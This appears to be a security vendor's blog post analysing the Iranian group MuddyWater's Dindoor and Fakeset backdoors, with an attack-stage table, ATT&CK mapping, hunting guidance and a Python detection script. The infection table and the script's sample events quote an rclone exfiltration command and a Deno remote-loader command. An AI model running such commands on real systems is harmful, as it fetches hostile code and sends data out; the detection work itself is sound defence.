


Prayukth K V
MuddyWater's new campaign signals a new and escalating phase of Iranian cyber operations
The geopolitical fault lines in the Middle East have always created deep echoes in cyberspace. As we have mentioned before (here), Iranian groups were never removed from the overall geopolitical equation in the region. Instead, they were lying low, waiting for the right time to strike, and it now seems they are ready to launch the next wave of cyberattacks on targets in the region and beyond.
MuddyWater, the Iranian state-sponsored advanced persistent threat (APT) group formally tied to Iran's Ministry of Intelligence and Security (MOIS), has once again demonstrated that it is not merely a regional nuisance but a persistent, evolving, and strategically motivated adversary capable of deeply compromising critical infrastructure.
The discovery of Dindoor, a previously unknown backdoor leveraging the Deno JavaScript runtime, alongside the Python-based Fakeset implant across U.S. bank networks, airports, nonprofits, and defense-adjacent software companies does not open a new chapter. Instead, it adds a few more paragraphs to the story of a calculated, long-running campaign that has been quietly embedding itself in Western networks since at least February 2026. The timing is not coincidental.
This analysis dissects the Dindoor campaign's technical architecture, examines MuddyWater's operational evolution, contextualizes the threat within Iran's broader cyber doctrine, and offers defenders a grounded and actionable framework for response.
Don’t forget to read our blog on “Securing critical infrastructure from APT Groups during geopolitical events,” here.
KEY INSIGHT: Iranian APT activity against U.S. targets did not begin after the airstrikes. MuddyWater was already present inside U.S. bank and airport networks many weeks before the first bomb touched Iranian soil. The cyber conflict preceded, and will most certainly outlast, any intervening kinetic phase.
Who Is MuddyWater? A threat actor that refuses to go silent
Origins and Attribution
MuddyWater (also known as Seedworm, TEMP.Zagros, Mango Sandstorm, TA450, and Static Kitten) has been operational since at least 2017, when it was first spotted targeting entities in Saudi Arabia, Iraq, Israel, and Turkey. In February 2022, the FBI, CISA, and the UK's NCSC jointly attributed MuddyWater to Iran's MOIS.
The group's operational remit is fairly broad: intelligence collection, credential theft, network prepositioning, and, when directed, large-scale or targeted destructive operations. Unlike purely financially motivated groups, MuddyWater operates as a cog in a larger Iranian national security apparatus. Its campaigns are often synchronized with broader geopolitical objectives and complemented by other Iranian APT clusters, including OilRig (APT34), Charming Kitten (APT42), Elfin, Fox Kitten, and hacktivist fronts like Handala Hack and Void Manticore.
Rapid tooling iteration: A defining factor for MuddyWater
What separates MuddyWater from many APT groups is its ability to modify tools and introduce variants quickly. Historically reliant on PowerShell-based implants and custom backdoors like POWERSTATS, the group has progressively broadened its malware development efforts across Python, C#, Go, and now JavaScript via the Deno runtime. Each iteration reflects a deliberate response to improved defender visibility into prior toolsets.
The shift to Deno illustrates the evolutionary pressure the group has responded to. Security operations centers (SOCs) have now built significant detection capability around Node.js-based threats and traditional scripting interpreter abuse. By pivoting to Deno, a modern, security-focused runtime with a distinct process signature, MuddyWater is working to exploit detection blind spots. This is not mere improvisation; it is adversarial learning at scale.
MuddyWater's willingness to rapidly retool (even during low bandwidth times) is one of its most underappreciated characteristics. Organizations that rely on IOC-based detection from prior campaigns will almost always be behind the curve. Behavioral analytics should therefore be the foundation and not the fallback.
Anatomy of the Dindoor backdoor: Technical deep dive
Why Deno? The strategic choice of a runtime
Deno is a modern, secure JavaScript and TypeScript runtime created by Ryan Dahl (the same developer behind Node.js) specifically to address Node.js's architectural shortcomings. It features sandboxed execution by default, built-in TypeScript support, and a permission-based model. In a legitimate developer ecosystem, these features are virtues to be hailed. But for a threat actor, they represent a near-perfect evasion vehicle and path.
Most enterprise endpoint detection and response (EDR) tools and security information and event management (SIEM) platforms are tuned to monitor suspicious invocations of common runtimes such as cmd.exe, PowerShell, python.exe, node.exe, and wscript.exe. Deno (deno.exe) is rarely in those watchlists. When Dindoor executes via Deno, the resulting process tree may appear anomalous to a trained analyst but will pass undetected through signature-based or process-lineage rule sets that lack Deno coverage.
Furthermore, since Deno fetches modules from URLs at runtime and supports HTTP/S imports natively, a Dindoor payload can be remarkably compact on disk: essentially a thin loader that pulls its real functionality from attacker-controlled or legitimate-appearing cloud infrastructure at execution time, which complicates static analysis significantly.
The infection chain
While the precise initial access vector has not been confirmed for every Dindoor incident, MuddyWater's established tradecraft provides a clear frame of reference. The group predominantly uses spear-phishing emails and honeytrap operations with convincing lures to establish beachheads, targeting high-value individuals including administrators, finance staff, and privileged users.
Once initial access is achieved, the attack proceeds through multiple stages:
| Stage | Component | Description |
| --- | --- | --- |
| 1 | Initial Access | Spear-phishing / honeytrap operations targeting privileged users; credential harvesting via malicious links or attachments |
| 2 | Payload Delivery | Dindoor or Fakeset deployed; Fakeset hosted on Backblaze cloud storage (gitempire.s3 and elvenforest.s3 buckets) |
| 3 | Execution | Dindoor executed via deno.exe; signed with a fraudulent certificate issued to 'Amy Cherne' to appear legitimate |
| 4 | Persistence & Lateral Movement | Scheduled tasks or registry modifications maintain persistence; stolen credentials enable lateral movement across victim networks |
| 5 | C2 Communication | Encrypted HTTPS comms to cloud storage C2; Backblaze used for Fakeset C2 and payload hosting; Wasabi used as exfiltration target |
| 6 | Data Exfiltration | Rclone utility used to transfer data: 'rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[BUCKET]'; bulk exfil to attacker-controlled Wasabi buckets |
The certificate reuse problem and why it's a gift to defenders
One of the most analytically significant elements of the Dindoor campaign is the reuse of fraudulent digital certificates across different malware families. Both Dindoor and Fakeset carry certificates issued to fictitious identities — 'Amy Cherne' and 'Donald Gay.' Critically, the Donald Gay certificate has appeared previously in MuddyWater-attributed malware families, specifically Stagecomp and Darkcomp, which have been flagged by Google, Microsoft, and Kaspersky.
Certificate reuse is an operational security failure on MuddyWater's part, but it is a recurring one — suggesting it reflects either resource constraints in their certificate acquisition pipeline or an organizational blind spot. For defenders, this creates a durable hunting opportunity: any binary signed with these certificate identities should be treated as immediately suspicious and investigated as a potential MuddyWater artifact, regardless of the specific malware family.
Fakeset and the multi-backdoor strategy
The deployment of both Dindoor and Fakeset across different victim organizations is not redundancy — it is a deliberate architectural choice. By maintaining separate toolsets signed with the same certificates but implemented in different languages (JavaScript via Deno vs. Python), MuddyWater can adapt to different target environments, evade tool-specific detection, and maintain operational continuity even if one implant family is burned.
The Fakeset backdoor was specifically identified on U.S. airport and nonprofit networks — two sectors with distinct security postures and regulatory environments. Airports, as critical infrastructure, often have more rigorous network segmentation, but Python-based implants blend into developer and administrative tooling with concerning ease in mixed-environment deployments.
Why now?
Cyber operations as Iran's asymmetric equalizer
Iran's cyber capabilities are best understood not as a standalone military branch but as an instrument of statecraft: a flexible, deniable, and scalable tool to project power beyond what conventional military means allow. When Iran faces significant kinetic setbacks, cyber operations historically surge within a short period of time. The pattern has been consistent since at least 2010, when the Stuxnet revelations redirected Iranian attention toward developing offensive cyber capabilities as a core national security priority.
The geopolitical context of early 2026 carries extraordinarily high stakes for everyone. Iranian state doctrine in this scenario is clear: respond across all available domains. Cyber operations are the most accessible, deniable, and immediate asymmetric tool available, and Iran will make use of it.
Pre-positioning before the bombs dropped
The detail that demands the most serious analytical attention is this: MuddyWater's activity on U.S. bank, airport, and defense-sector software company networks began in early February 2026, just weeks before the February 28 airstrikes. This is not reactive. This is pre-positioning.
The ability to pre-position in order to establish persistent access to high-value targets before a triggering geopolitical event is the hallmark of a fairly mature, well-resourced APT program. It means Iran had intelligence suggesting an escalation was coming, or that it maintains persistent access to U.S. critical infrastructure as a standing capability regardless of the current threat environment. The pivot from espionage to destruction, when directed, could happen with minimal additional access effort.
The Dindoor campaign is not just about data theft. It is about optionality. Iran is building cross-domain leverage and the ability to cause disruption on demand, in the sectors that matter most, when geopolitical circumstances call for it. Treating this as a standard espionage case would be a category error.
The broader Iranian cyber ecosystem
MuddyWater does not operate in isolation. The Iranian cyber threat ecosystem in early 2026 involves multiple simultaneously active threat clusters, each with distinct targeting profiles, toolsets, and operational objectives:
• Agrius: primarily focused on destructive operations using wiper malware, historically targeting Israeli organizations.
• OilRig (APT34): sophisticated intelligence collection against government and energy sectors, with a history of targeting Middle Eastern and North American organizations.
• Charming Kitten (APT42): specializing in credential phishing campaigns targeting journalists, academics, and policy figures with access to sensitive information.
• Fox Kitten: known for exploitation of VPN vulnerabilities and initial access brokering for other Iranian APT groups.
• Hacktivist fronts (Handala Hack and Void Manticore): conducting disruptive, psychologically oriented operations in parallel with state espionage campaigns.
The simultaneous activation of multiple Iranian cyber clusters in response to geopolitical escalation creates a layered threat environment that overwhelms defenders focused on a single adversary profile. Security teams must operate with the understanding that a MuddyWater detection may be the visible surface of a much broader Iranian cyber operation already underway.
MITRE ATT&CK Mapping: Operationalizing the threat
Understanding the Dindoor campaign through the MITRE ATT&CK framework enables defenders to translate threat intelligence into detection engineering priorities. The following table maps confirmed and assessed TTPs from the campaign:
| ATT&CK ID | Technique | Dindoor/MuddyWater Context |
| --- | --- | --- |
| T1566.001 | Phishing: Spearphishing | Primary initial access vector; targeted phishing with sector-specific lures and honeytrap operations |
| T1059.007 | Command and Scripting Interpreter: JavaScript | Dindoor executes malicious JavaScript via the Deno runtime; core evasion mechanism |
| T1027 | Obfuscated Files or Information | Malware signed with fraudulent certificates; cloud-hosted payloads reduce on-disk footprint |
| T1071.001 | Application Layer Protocol: Web Protocols | HTTPS-based C2 comms; cloud storage services used to disguise malicious traffic |
| T1105 | Ingress Tool Transfer | Rclone used to stage and transfer data; Fakeset downloaded from Backblaze URLs |
| T1041 | Exfiltration Over C2 Channel | Data exfiltrated to attacker-controlled Wasabi cloud storage buckets via Rclone |
| T1053 | Scheduled Task/Job | Persistence maintained via scheduled tasks or registry modifications post-compromise |
| T1078.002 | Valid Accounts: Domain Accounts | Stolen credentials used for lateral movement and privilege escalation within victim environments |
| T1553.002 | Subvert Trust Controls: Code Signing | Fraudulent certificates ('Amy Cherne', 'Donald Gay') used to make malware appear legitimate |
Detection priorities based on this mapping should include: anomalous Deno runtime execution, unusual cloud storage egress (particularly to Backblaze or Wasabi), Rclone presence in environments where it has no legitimate use, and certificate-based hunting for known MuddyWater signing identities.
The defender's playbook: Grounded, prioritized response
Tier 1: Immediate Detection and Hunting Actions
• Deno Process Hunting: Hunt for the Deno runtime (deno.exe) on all endpoints; flag any instance in environments where TypeScript/JavaScript development is not an established function.
• Cloud Storage Traffic Audit: Query SIEM for outbound connections to Backblaze (backblazeb2.com) and Wasabi (wasabisys.com) storage to correlate with time-of-day, user identity, and data volume anomalies.
• Rclone Detection: Search for Rclone (rclone.exe) installation or execution, particularly command-line invocations referencing 'wasabi:' as a destination.
• Certificate Hunting: Execute certificate-based threat hunting: query your environment for any binaries signed by certificates issued to 'Amy Cherne' or 'Donald Gay'; treat matches as high-confidence MuddyWater artifacts.
• YARA Rule Deployment: Deploy YARA rules for Dindoor (SHA-256: 0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542) and Fakeset malware families across EDR platforms.
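As an added example (not code from Shieldworkz, Symantec, or any of the reporting cited here), the Tier 1 hunts above and the detection priorities from the ATT&CK mapping expressed as rules over constructed Sysmon-style process and network events; the host names, the approved-host list, the byte threshold, and the business-hours window are assumptions to tune per environment.

```python
import re
from dataclasses import dataclass

CLOUD_STORAGE_DOMAINS = ("backblazeb2.com", "wasabisys.com")
SUSPECT_SIGNERS = ("amy cherne", "donald gay")   # identities reused across MuddyWater families
DENO_APPROVED_HOSTS = {"dev-ws-01"}              # assumption: hosts where Deno is sanctioned
EGRESS_BYTES_THRESHOLD = 500 * 1024 * 1024       # assumption: 500 MiB in a single connection
BUSINESS_HOURS = range(7, 20)                    # assumption: 07:00-19:59 local time


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def analyse(events):
    """Return one Finding per event that matches a Dindoor/Fakeset hunt rule."""
    findings = []
    for ev in events:
        host = ev.get("host", "?")
        image = ev.get("image", "").lower()
        name = image.rsplit("\\", 1)[-1]          # bare binary name, e.g. deno.exe
        if ev["type"] == "process":
            cmd = ev.get("cmdline", "")
            if name == "deno.exe" and host not in DENO_APPROVED_HOSTS:
                findings.append(Finding(host, "deno_unexpected_host", cmd))
            if name == "rclone.exe" and re.search(r"\bwasabi:", cmd):
                findings.append(Finding(host, "rclone_wasabi_destination", cmd))
            signer = ev.get("signer", "")
            if any(s in signer.lower() for s in SUSPECT_SIGNERS):
                findings.append(Finding(host, "muddywater_signer", signer))
        elif ev["type"] == "network":
            dest = ev.get("dest_host", "").lower()
            if not dest.endswith(CLOUD_STORAGE_DOMAINS):
                continue
            # Cloud storage egress is normal; correlate initiating process, volume and time.
            reasons = []
            if name in ("deno.exe", "rclone.exe"):
                reasons.append(f"initiated by {name}")
            if ev.get("bytes_out", 0) >= EGRESS_BYTES_THRESHOLD:
                reasons.append(f"{ev['bytes_out']} bytes out")
            if ev.get("hour", 12) not in BUSINESS_HOURS:
                reasons.append(f"off-hours ({ev['hour']:02d}:00)")
            if reasons:
                findings.append(Finding(host, "cloud_storage_egress",
                                        f"{dest}: " + "; ".join(reasons)))
    return findings


# Constructed sample telemetry (not real IoCs): one sanctioned Deno host, one
# suspicious workstation, and a legitimate backup agent talking to Backblaze.
SAMPLE_EVENTS = [
    {"type": "process", "host": "dev-ws-01", "image": r"C:\Tools\deno.exe",
     "cmdline": "deno run main.ts", "signer": "Example Dev Tools Inc."},
    {"type": "process", "host": "fin-ws-07", "image": r"C:\Users\Public\deno.exe",
     "cmdline": "deno run -A https://example.invalid/loader.ts", "signer": "Amy Cherne"},
    {"type": "process", "host": "fin-ws-07", "image": r"C:\Temp\rclone.exe",
     "cmdline": r"rclone copy C:\backups wasabi:[BUCKET]", "signer": ""},
    {"type": "network", "host": "fin-ws-07", "image": r"C:\Temp\rclone.exe",
     "dest_host": "s3.us-west-1.wasabisys.com", "bytes_out": 3 * 1024 ** 3, "hour": 2},
    {"type": "network", "host": "backup-01", "image": r"C:\Program Files\Backup\agent.exe",
     "dest_host": "api.backblazeb2.com", "bytes_out": 40 * 1024 ** 2, "hour": 11},
]


def run_sample():
    return analyse(SAMPLE_EVENTS)
```

The backup agent's Backblaze connection produces no finding because volume, process, and time all look routine; the same domain from rclone.exe at 02:00 moving gigabytes is flagged on all three counts.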
Tier 2: Architectural and Policy Controls
• Runtime Whitelisting: Implement application whitelisting policies that explicitly deny execution of non-approved runtimes, including Deno. Review your approved runtime list against current developer tooling needs.
• MFA Hardening: Enforce phishing-resistant MFA (FIDO2/WebAuthn) across all privileged accounts. MuddyWater's credential theft pipeline depends on compromising accounts that remain protected only by traditional MFA factors.
• Egress Filtering: Review and tighten egress firewall rules to require explicit approval for traffic to cloud storage providers not in your organization's approved vendor list.
• Network Segmentation: Implement network segmentation controls that prevent lateral movement from compromised endpoints to sensitive systems, particularly between corporate and operational technology (OT) networks in airports and industrial environments.
• Tabletop Exercises: Conduct tabletop exercises simulating an Iranian APT pre-positioning scenario, specifically the pivot from passive collection to destructive action, to stress-test your incident response playbooks.
Tier 3: Threat Intelligence Integration
• Threat Intel Feeds: Subscribe to threat intelligence feeds that provide near-real-time indicators from MuddyWater campaigns, such as those from Shieldworkz.
• Vulnerability Prioritization: Patch aggressively against CVEs known to be exploited by Iranian APTs, with priority on CVE-2017-7921, CVE-2023-6895, CVE-2021-36260, CVE-2025-34067, and CVE-2021-33044.
• IOC Integration: Integrate MuddyWater's known C2 infrastructure indicators, including specific Backblaze and Wasabi bucket URLs documented in Symantec reporting, into your SIEM and DNS filtering platforms.
FOR CRITICAL INFRASTRUCTURE OPERATORS: Banking, aviation, and defense-sector organizations face an elevated and specific risk from this campaign. The MuddyWater intrusion into a U.S. airport represents a concerning precedent. Organizations in these sectors should assume they may already be compromised and conduct a proactive threat hunt rather than waiting for alerts.
Beyond the campaign: The future trajectory of Iranian APT groups
The cloud as both shield and sword
Perhaps the most strategically significant aspect of the Dindoor campaign is MuddyWater's wholesale embrace of legitimate cloud infrastructure as both a delivery mechanism and an exfiltration channel. Backblaze and Wasabi are legitimate, commercially available cloud storage services used by millions of businesses globally. Their traffic is almost universally permitted in enterprise network environments.
By routing malware delivery and data exfiltration through these platforms, MuddyWater effectively weaponizes the trust that organizations extend to cloud services as a matter of operational necessity. This is not a new concept — it has been observed in multiple APT campaigns over the past five years — but MuddyWater's application of it signals a broader trend: the cloud perimeter is becoming the primary battleground for advanced persistent threats, and traditional network-layer defenses are insufficient in isolation.
Living off the land, but at a much higher altitude
The use of Deno alongside the Rclone utility represents a sophisticated variation of living-off-the-land (LotL) techniques. Rather than abusing Windows built-in utilities like wmic.exe or certutil.exe that are now heavily monitored, MuddyWater is exploiting the legitimacy of cross-platform, open-source developer tools that are increasingly present in modern enterprise environments. This signals a maturation in Iranian LotL methodology: moving from OS-native binary abuse to ecosystem-native tool abuse.
The implication for defenders is significant: your detection engineering must evolve from 'what Windows binaries are being abused' to 'what legitimate tools anywhere in our environment could be weaponized, and are we monitoring their execution context closely enough to distinguish legitimate from malicious use?'
The espionage-to-disruption pivot risk
Every confirmed MuddyWater intrusion in this campaign involves a network where the initial objective appears to be intelligence collection. But pre-positioned access for collection is functionally identical to pre-positioned access for disruption. The difference is intent — and intent is not observable from network telemetry alone.
Iran's history of cyber operations includes destructive campaigns: Shamoon against Saudi Aramco in 2012, the DDoS campaigns against U.S. financial institutions in Operation Ababil, and more recently the wiper attacks attributed to Agrius against Israeli targets. The lesson from this history is that Iran's cyber actors do not distinguish permanently between espionage and disruption. Instead they shift modes in response to political direction.
The organizations currently compromised by Dindoor and Fakeset, which include a bank, an airport, and defense-sector software suppliers, are exactly the kinds of targets that would feature in a disruptive Iranian cyber operation designed to maximize psychological and economic impact on the United States. This is not a theoretical risk. It is a live and present one.
A persistent threat
The Dindoor campaign is not an isolated incident. It is a data point in a long-running pattern of Iranian cyber operations against Western targets — a pattern that has escalated consistently with each geopolitical flashpoint and shows no sign of reversal.
MuddyWater's deployment of a novel, Deno-based backdoor, its simultaneous use of a Python implant family, its embrace of legitimate cloud services for both delivery and exfiltration, and its careful attention to certificate-based legitimization together paint a picture of an adversary that is methodical, adaptive, and patient. These are not the characteristics of a threat that will be neutralized by a single defensive measure or a single geopolitical development.
Organizations, particularly those in financial services, aviation, critical infrastructure, and defense contracting, must treat the Iranian cyber threat as a structural and permanent feature of their risk landscape and not a periodic concern to be addressed when a new campaign headline appears. The investment in behavioral detection, threat hunting, cloud traffic visibility, and continuous threat intelligence integration is not optional. It is the cost of operating in a world where adversaries of this sophistication have already decided you are a target.
The Iranian threat actors are not back. They never left. The question is whether your organization is ready for what is lined up.
Additional resources:
IEC 62443-Based Risk assessment checklist for Airport operations and critical infrastructure
Operational Technology (OT) Incident response checklist
IEC 62443 OT Cybersecurity Risk Assessment Field Checklist for Oil & Gas Sites
Defensive Posture Guidance for Middle Eastern Enterprises